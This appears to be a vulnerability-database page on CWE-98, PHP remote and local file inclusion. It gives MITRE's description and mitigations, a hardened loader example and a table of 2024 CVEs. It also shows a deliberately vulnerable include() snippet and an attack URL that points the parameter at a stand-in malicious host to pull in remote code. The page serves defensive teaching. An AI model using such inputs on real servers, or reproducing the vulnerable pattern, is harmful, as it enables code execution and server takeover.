
CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')) — Vulnerability Class 1083

1083 vulnerabilities classified as CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')). AI Chinese analysis included.

CWE-98 represents a critical input validation weakness where PHP applications fail to properly sanitize user-supplied data before passing it to include or require functions. Attackers typically exploit this by injecting malicious URLs or local file paths, enabling Remote File Inclusion (RFI) or Local File Inclusion (LFI). This allows adversaries to execute arbitrary code hosted on external servers or access sensitive system files, often leading to full server compromise. To mitigate this risk, developers must strictly validate and whitelist allowed filenames or paths, ensuring only expected local resources are included. Additionally, disabling the allow_url_include and allow_url_fopen directives in the PHP configuration prevents the inclusion of remote files entirely. Implementing robust input validation and adhering to the principle of least privilege significantly reduces the attack surface associated with dynamic file inclusion mechanisms.

MITRE CWE Description
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Common Consequences (1)
Integrity, Confidentiality, Availability: Execute Unauthorized Code or Commands
The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert PHP code into files on the local machine which can then be included and force the code to execute since PHP ignores everything in the f…
Mitigations (5)
Architecture and Design: Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and Design: When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Architecture and Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, Operation: Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, Operation: Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
Bad (PHP, victim.php):
$dir = $_GET['module_name'];
include($dir . "/function.php");
Attack:
victim.php?module_name=http://malicious.example.com
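The fixed-mapping mitigation listed above, applied to the victim.php example: an added PHP illustration that is not part of the CWE entry or of any product listed on this page. The module table, load_module(), and the modules/ directory are assumptions; the code targets PHP 8.

```php
<?php
// Added example (not from the CWE entry or any listed product). Shows the
// victim.php pattern beside a hardened loader that applies the fixed-mapping
// mitigation. load_module(), MODULE_MAP and the modules/ directory are assumptions.

// The vulnerable pattern from the example: a user-controlled string becomes
// the include path, so a URL (RFI) or a traversal sequence (LFI) reaches include().
function load_module_vulnerable(string $dir): void
{
    include($dir . "/function.php");
}

// Hardened form: fixed IDs map to known local files; anything else is rejected
// before it can influence the path at all (ID 1 -> inbox, ID 2 -> profile).
const MODULE_MAP = [
    1 => 'inbox',
    2 => 'profile',
];

function load_module(mixed $moduleId, string $baseDir): string
{
    // Reject non-string input (e.g. module_name[]=... arrays) and unknown IDs.
    if (!is_string($moduleId) || !array_key_exists($moduleId, MODULE_MAP)) {
        throw new InvalidArgumentException('unknown module');
    }
    $root = realpath($baseDir);
    $path = realpath($baseDir . '/' . MODULE_MAP[$moduleId] . '/function.php');
    // Defence in depth: the resolved file must exist and sit under the module
    // root, which also catches a mis-edited MODULE_MAP entry.
    if ($root === false || $path === false
        || !str_starts_with($path, $root . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('module path outside module root');
    }
    return $path;
}

// Request handler: include() only ever receives a path load_module() produced.
try {
    include load_module($_GET['module_name'] ?? null, __DIR__ . '/modules');
} catch (Throwable $e) {
    http_response_code(400);
    exit('invalid module');
}
```

Pair this with allow_url_include=Off in php.ini, as the introduction recommends, so that even a regression in the mapping cannot turn into remote inclusion.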
| CVE ID | Title | Product | CVSS | Severity | Published |
|---|---|---|---|---|---|
| CVE-2024-37410 | WordPress PowerPack Lite for Beaver Builder plugin <= 1.3.0.3 - Local File Inclusion vulnerability | PowerPack Lite for Beaver Builder | 4.9 | Medium | 2024-07-09 |
| CVE-2024-5431 | WPCafe – Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce <= 2.2.25 - Authenticated (Contributor+) File inclusion via Shortcode | WPCafe – Restaurant Menu, Online Food Ordering & Table Booking System | 8.8 | High | 2024-06-25 |
| CVE-2024-5455 | The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce <= 5.5.6 - Authenticated (Contributor+) Local File Inclusion | The Plus Addons for Elementor Page Builder Pro | 8.8 | High | 2024-06-21 |
| CVE-2024-5503 | WP Blog Post Layouts <= 1.1.3 - Authenticated (Contributor+) Local File Inclusion | WP Blog Post Layouts | 8.8 | High | 2024-06-21 |
| CVE-2024-5574 | WP Magazine Modules Lite <= 1.1.2 - Authenticated (Contributor+) Local File Inclusion | WP Magazine Modules Lite | 7.5 | High | 2024-06-19 |
| CVE-2024-4551 | Video Gallery – YouTube Playlist, Channel Gallery by YotuWP <= 1.3.13 - Authenticated (Contributor+) Arbitrary File Inclusion via Shortcode | Video Gallery – YouTube Playlist, Channel Gallery by YotuWP | 6.4 | Medium | 2024-06-15 |
| CVE-2024-4258 | Video Gallery – YouTube Playlist, Channel Gallery by YotuWP <= 1.3.13 - Unauthenticated Local File Inclusion | Video Gallery – YouTube Playlist, Channel Gallery by YotuWP | 9.8 | Critical | 2024-06-15 |
| CVE-2024-3813 | tagDiv Composer <= 4.8 - Authenticated (Contributor+) Local File Inclusion via Shortcode | tagDiv Composer | 8.8 | High | 2024-06-15 |
| CVE-2024-5577 | Where I Was, Where I Will Be <= 1.1.1 - Unauthenticated Remote File Inclusion | Where I Was, Where I Will Be | 9.8 | Critical | 2024-06-14 |
| CVE-2024-4936 | Canto <= 3.0.8 - Unauthenticated Remote File Inclusion | Canto | 9.8 | Critical | 2024-06-14 |
| CVE-2024-36415 | SuiteCRM Improper Control of Filename for Include Statement in PHP and Unrestricted Upload of File with Dangerous content leads to authenticated remote code execution | SuiteCRM | 9.1 | Critical | 2024-06-10 |
| CVE-2024-35650 | WordPress MelaPress Login Security plugin <= 1.3.0 - Remote File Inclusion vulnerability | MelaPress Login Security | 4.9 | Medium | 2024-06-10 |
| CVE-2024-4887 | Qi Addons For Elementor <= 1.7.2 - Authenticated (Contributor+) Local File Inclusion | Qi Addons For Elementor | 7.5 | High | 2024-06-07 |
| CVE-2024-35629 | WordPress Easy Digital Downloads – Recent Purchases plugin <= 1.0.2 - Remote File Inclusion vulnerability | Easy Digital Downloads – Recent Purchases | 9.6 | Critical | 2024-06-04 |
| CVE-2024-5348 | Elements For Elementor <= 2.1 - Authenticated (Contributor+) Local File Inclusion via Multiple Widget Attributes | Elements For Elementor | 8.8 | High | 2024-06-01 |
| CVE-2024-3564 | Content Blocks (Custom Post Widget) <= 3.3.0 - Authenticated (Contributor+) Local File Inclusion via Shortcode | Content Blocks (Custom Post Widget) | 8.8 | High | 2024-06-01 |
| CVE-2024-5345 | Responsive Owl Carousel for Elementor <= 1.2.0 - Local File Inclusion | Responsive Owl Carousel for Elementor | 8.8 | High | 2024-05-31 |
| CVE-2024-3812 | Salient Core <= 2.0.7 - Authenticated (Contributor+) Local File Inclusion via Shortcode | Salient Core | 7.5 | High | 2024-05-18 |
| CVE-2024-3810 | Salient Shortcodes <= 1.5.3 - Authenticated (Contributor+) Local File Inclusion via Shortcode | Salient Shortcodes | 8.8 | High | 2024-05-18 |
| CVE-2024-32523 | WordPress Mailster plugin <= 4.0.6 - Unauthenticated Local File Inclusion vulnerability | Mailster | 8.1 | High | 2024-05-17 |
| CVE-2024-27971 | WordPress Premmerce Permalink Manager for WooCommerce plugin <= 2.3.10 - Local File Inclusion vulnerability | Premmerce Permalink Manager for WooCommerce | 8.3 | High | 2024-05-17 |
| CVE-2024-3551 | Penci Soledad Data Migrator <= 1.3.0 - Unauthenticated Local File Inclusion | Penci Soledad Data Migrator | 9.8 | Critical | 2024-05-17 |
| CVE-2024-4670 | All-in-One Video Gallery <= 3.6.5 - Authenticated (Contributor+) Local File Inclusion via aiovg_search_form Shortcode | All-in-One Video Gallery | 8.8 | High | 2024-05-15 |
| CVE-2024-31459 | Cacti RCE vulnerability by file include in lib/plugin.php | cacti | 8.1 | High | 2024-05-13 |
| CVE-2024-3808 | Porto Theme - Functionality <= 3.1.0 - Authenticated (Contributor+) Local File Inclusion via Shortcode | Porto Theme - Functionality | 8.8 | High | 2024-05-09 |
| CVE-2024-3809 | Porto Theme - Functionality <= 3.0.9 - Authenticated (Contributor+) Local File Inclusion via Post Meta | Porto Theme - Functionality | 8.8 | High | 2024-05-09 |
| CVE-2024-3806 | Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts | Porto | 9.8 | Critical | 2024-05-09 |
| CVE-2024-4441 | XML Sitemap & Google News <= 5.4.8 - Unauthenticated Local File Inclusion | XML Sitemap & Google News | 8.1 | High | 2024-05-09 |
| CVE-2024-3807 | Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta | Porto | 8.8 | High | 2024-05-09 |
| CVE-2024-3849 | Click to Chat – HoliThemes <= 3.35 - Authenticated (Contributor+) Local File Inclusion | Click to Chat – HoliThemes | 8.8 | High | 2024-05-02 |

Vulnerabilities classified as CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')) represent 1083 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.